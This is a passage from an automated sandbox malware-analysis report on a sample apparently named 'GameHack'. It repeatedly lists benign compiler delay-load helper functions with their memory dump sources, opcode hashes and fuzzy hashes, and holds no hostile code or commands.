                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 58b7b342e34d0fdbfce6dcf1690795fba1048738901ba5f3fd1af812914ae445
                                      • Instruction ID: 1423517925eca8c306e37b56698f669be3cbebcbacde6bcdcb91092ec79288af
                                      • Opcode Fuzzy Hash: 58b7b342e34d0fdbfce6dcf1690795fba1048738901ba5f3fd1af812914ae445
                                      • Instruction Fuzzy Hash: 5CB012A536D7467C314C71027D66C3B020CD5C0B20330552AB40DF00C1D4809C49B432
                                      Function 00EEE1F9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEE20B
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 36e8a1a06ebddddd59924251c38c6ea2c64ce982c9aa9b33c40d4d1147b81524
                                      • Instruction ID: b29ea28365fb08c01a6351a1bd81aa911fe0fb9044426865fc0802c01a94c2db
                                      • Opcode Fuzzy Hash: 36e8a1a06ebddddd59924251c38c6ea2c64ce982c9aa9b33c40d4d1147b81524
                                      • Instruction Fuzzy Hash: 99B012E136E0457C320C5102BD06C76031CC4C0B60330D01AF305F41C19580DC09B033
                                      Function 00EED942 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: f9607761bdd166c11a10ba68093e2fe773c32296e6190b445b1e058f66b73d84
                                      • Instruction ID: 03eb42e87939d05c126cdd7f063d71b7b4d843d943327ee6d98af7a612ee60cf
                                      • Opcode Fuzzy Hash: f9607761bdd166c11a10ba68093e2fe773c32296e6190b445b1e058f66b73d84
                                      • Instruction Fuzzy Hash: 23B012B136D5466C314CB1066E16D3602CCC5C0B20730501AB00DF01C1D6409C067432
                                      Function 00EED92E Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: efba1ed4a2e6b784ac65fb95f67f48a1bbe20df53f1c8554f78c69b48deebd8f
                                      • Instruction ID: 5bd29ef65574384d80da3cb3b55f28797de7d4658f2b04f218b275ba54a91926
                                      • Opcode Fuzzy Hash: efba1ed4a2e6b784ac65fb95f67f48a1bbe20df53f1c8554f78c69b48deebd8f
                                      • Instruction Fuzzy Hash: 1BB012A136D5466C314CB1166D16D36028CC5C1B20330901AB50DF01C1D6409C057432
                                      Function 00EED924 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 906929093986084c63e317baf4e52fc58fcc0af0e546d3441aa076b9443ee24d
                                      • Instruction ID: 452cada14be7aa6450deb9cce0cb17f011b366da80868498af41291fd1d725ac
                                      • Opcode Fuzzy Hash: 906929093986084c63e317baf4e52fc58fcc0af0e546d3441aa076b9443ee24d
                                      • Instruction Fuzzy Hash: 96B012A137E4466C314CB1066D56D36028DD9C0B20730501AB14DF01C1D4409C057432
                                      Function 00EED906 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: da0db7d89331f0bfc14e23d4622e58db486ecda467506e9eadf1c5a6719b393c
                                      • Instruction ID: 42d93dac8ac4e19ccc879507572d686fcfea2fd825fa266ead5a41a8eb92ce15
                                      • Opcode Fuzzy Hash: da0db7d89331f0bfc14e23d4622e58db486ecda467506e9eadf1c5a6719b393c
                                      • Instruction Fuzzy Hash: 11B012A136E4466C314CB1066D56D36024DC5C1B20730901AB50DF01C1D4409C057432
                                      Function 00EED910 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EED8A3
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 813fe96759f991c1a1a620e8b8a60e57a98b8fe34c03c065b395c95663af23b8
                                      • Instruction ID: bb5b27f91a7e3c35619e4af8917cad20e4a503cad4efc40731b24ed52860baae
                                      • Opcode Fuzzy Hash: 813fe96759f991c1a1a620e8b8a60e57a98b8fe34c03c065b395c95663af23b8
                                      • Instruction Fuzzy Hash: 92B012B136E5466C318CB2067D56D36024DC5C0B20730511AB10DF01C1D4809C457432
                                      Function 00EEDACF Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 9cd24b94ed1e9eea5f41261a005cb6c65648c2823bf49ac50607bfa29e58a3eb
                                      • Instruction ID: acb4a77f53e66d6a03c60271e535c40fbe19814277962bdb61d19802e63435e9
                                      • Opcode Fuzzy Hash: 9cd24b94ed1e9eea5f41261a005cb6c65648c2823bf49ac50607bfa29e58a3eb
                                      • Instruction Fuzzy Hash: 78B012F136D045AC314CB1076C02D7A028CC0C0B20330D12BF40DE0185D4448D08B832
                                      Function 00EEDAD9 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cd8efdfdbdb0095263946d183d090bde3835b7d389a7219328447b7325fc3a8f
                                      • Instruction ID: c7f5ce07f0d978cf19a41bad486832ff98957f7eb656e3904c0a6dbbd4d623df
                                      • Opcode Fuzzy Hash: cd8efdfdbdb0095263946d183d090bde3835b7d389a7219328447b7325fc3a8f
                                      • Instruction Fuzzy Hash: E0B012E136D0456C314CB1076D02E7E028DD0C4B20330952BF00DE0185D4408C0DB432
                                      Function 00EEDBE8 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 08bb128b9c10ee79eab660da1f0ef247f955e11371bfe4a4aeba4f597a99d14a
                                      • Instruction ID: 22c4dcdea2e403c679ef372db42fc2086a984a25cc05d615c2df8e2479aea511
                                      • Opcode Fuzzy Hash: 08bb128b9c10ee79eab660da1f0ef247f955e11371bfe4a4aeba4f597a99d14a
                                      • Instruction Fuzzy Hash: AEB012E537C04BAC314C92066C07E7702ACD0C0B20330A01AF409F11C1EA408C0CB032
                                      Function 00EEDBFC Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 4b25e4dde1e6e724335423d5dc0750d26de26dc21e1c2e1df82786079be4f8c3
                                      • Instruction ID: 0432a145acd6af0ded2ff3e397e6cd009921e3090184455f26fbee8ee2d66e23
                                      • Opcode Fuzzy Hash: 4b25e4dde1e6e724335423d5dc0750d26de26dc21e1c2e1df82786079be4f8c3
                                      • Instruction Fuzzy Hash: C8B012E537C08B6C314C92066D07E77025CD0C0B20330A01AF109F01C1EA408C09B032
                                      Function 00EEDBC3 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 55c76b4888d4f95a2273c0d94346c41c0ab7c60f805a59e7f1950b6b66c416a3
                                      • Instruction ID: 7110c4349d7782c4d75016b0f86e60135d7a46c23187489e778ea74ca2ac08eb
                                      • Opcode Fuzzy Hash: 55c76b4888d4f95a2273c0d94346c41c0ab7c60f805a59e7f1950b6b66c416a3
                                      • Instruction Fuzzy Hash: EDB012E537C14F7C324C52027C07D77021CD0C0B20330612AF005F00C1EA408C4CB032
                                      Function 00EEDBDE Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDBD5
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 0d4dc8f92b8edc433b6b16c36a277e0a1ca964604d7bf53b40ab369b3d0decdd
                                      • Instruction ID: 1d4b5f6f2c97b3d3a47392c8a774127ad5762c8fa56790f69da47106925bc8e4
                                      • Opcode Fuzzy Hash: 0d4dc8f92b8edc433b6b16c36a277e0a1ca964604d7bf53b40ab369b3d0decdd
                                      • Instruction Fuzzy Hash: 02B012E537C04AAC314C92166D07F76025CE0C0B20330602AF00AF01C1EA408C0CB032
                                      Function 00EEDB01 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDAB2
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: cc06a96339f1fa0e1b5dc7a10f3ffdfa395100ac8bc4623087febce7bf9fa038
                                      • Instruction ID: f00d59d9fc19f3d4b023676653e3133dc22bcc9d325955e07b374e13031bce97
                                      • Opcode Fuzzy Hash: cc06a96339f1fa0e1b5dc7a10f3ffdfa395100ac8bc4623087febce7bf9fa038
                                      • Instruction Fuzzy Hash: 2FB012E13AD1496C714CB1076D02E7A028DF0C0B20330512BF00DE0185D5408C08B532
                                      Function 00EEDC5D Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297308438.0000000000F03000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F0E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F14000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297333031.0000000000F31000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                      • Associated: 00000008.00000002.1297422726.0000000000F32000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_8_2_ed0000_GameHack.jbxd
                                      Similarity
                                      • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                      • String ID:
                                      • API String ID: 1269201914-0
                                      • Opcode ID: 78b89c05f7188f38aacee93c4c4de3d0e8a5e659b92a34d56d324123d3813338
                                      • Instruction ID: 88d39b7be6767d534a951f2061ba1f9303f65ada380e3ac0a054564a93d6d305
                                      • Opcode Fuzzy Hash: 78b89c05f7188f38aacee93c4c4de3d0e8a5e659b92a34d56d324123d3813338
                                      • Instruction Fuzzy Hash: D5B012A537C6456C714CB10AAD02D7E026CD1C0B60330551BF109F02C2D580DC04B032
                                      Function 00EEDC53 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                      Download Yara Rule
                                      APIs
                                      • ___delayLoadHelper2@8.DELAYIMP ref: 00EEDC36
                                        • Part of subcall function 00EEDF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00EEDFD6
                                        • Part of subcall function 00EEDF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00EEDFE7
                                      Memory Dump Source
                                      • Source File: 00000008.00000002.1297270263.0000000000ED1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00ED0000, based on PE: true
                                      • Associated: 00000008.00000002.1297245855.0000000000ED0000.00000002.00000001.01000000.0000000B.sdmpDownload File
